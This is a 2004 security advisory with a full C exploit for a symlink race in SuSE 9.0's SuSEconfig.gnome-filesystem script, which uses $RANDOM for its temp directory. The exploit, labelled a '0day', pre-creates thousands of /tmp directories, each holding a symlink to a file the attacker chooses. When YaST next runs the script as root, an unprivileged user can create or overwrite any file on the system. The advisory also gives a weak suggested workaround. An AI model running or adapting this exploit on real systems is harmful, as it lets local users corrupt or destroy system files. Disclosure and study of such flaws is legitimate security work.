Product: SuSE 9.0
Date: 12.01.2004
Risk: medium to high
Author: l0om <l0om@excluded.org>

There is a symlink problem in the SuSEconfig.gnome-filesystem
script. a normal user can create and overwrite every file
on the system.

When this script gets executed by YaST after a
configuration change it does the following:

TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
mkdir $TEMP
touch $TEMP/list
[...]
echo >$TEMP/found
[...]

the env variable $RANDOM includes a random number. in my test
this number goes up from 1 to 33000. But also if it goes up to
65535 it is still vul. to a symlink attack. this is nearly as
bad as the symlink problem which has been found on SuSE 8.2.
On 8.2 a SuSEconf script has createed a link with the $$ at the
file end.

I have used a little exploit written in C which creates the
directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1" up to
33000. in every directory i have created a symlink to a file
which i want to create or to overwrite. as the filename i have
taken the $TEMP/found and let it point to some file. in my test i
have taken the /etc/nologin- and hey- it has worked!

a workaround would be to edit the SuSEconfig.gnome-filesystem
script and to change the
TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
to something like
TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM.$RANDOM.$RANDOM.$RANDOM
because the RANDOM number changes everytime.

*******************************************************************/

#include <stdio.h>
#include <unistd.h>
#include <string.h>

#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000

int main(int argc, char **argv)
{
int i;
char buf[150];

printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem 0day exploit\n");
printf("\t-------------------------------------------------------------\n");
printf("\tdiscovered and written by l0om <l0om@excluded.org>\n");
printf("\t WWW.EXCLUDED.ORG\n\n");

if(argc != 2) {
printf("usage: %s <destination-file>\n",argv[0]);
exit(0xff);
}

printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);
read(1, buf, 1); fflush(stdin);

umask(0000);
printf("working\n\n");
for(i = START; i < END; i++) {
snprintf(buf, sizeof(buf),"%s%d",PATH,i);
if(mkdir(buf,00777) == -1) {
fprintf(stderr, "cannot creat directory [Nr.%d]\n",i);
exit(0xff);
}
if(!(i%1000))printf(".");
strcat(buf, "/found");
if(symlink(argv[1], buf) == -1) {
fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i);
exit(0xff);
}
}
printf("\ndone!\n");
printf("next time the SuSE.gnome-filesystem script gets executed\n");
printf("we will create or overwrite file %s\n",argv[1]);
return(0x00);
}
/* i cant wait for the new gobbles comic! */


greetings:
Maximilian -- for the test machine/s
dna -- "Toll, l0om hatte ne shell. jetzt kann ich wieder
formatieren..."
Capt. Boris -- der Programmierer meines vertrauens *G*
adminP -- everyone needs an expert :)
Sgt.weyers -- greets
dajak -- check out his great project www.myshell.de/data/pfw
proxy, Takt, FE2k, sirius, and the rest of www.excluded.org

bands like sick of it all, nofx, propagandhi, less than jake, pennywise...

YaCP - Yast another CyberPunk
# Phree the Cyberspace

- l0om
- http://www.excluded.org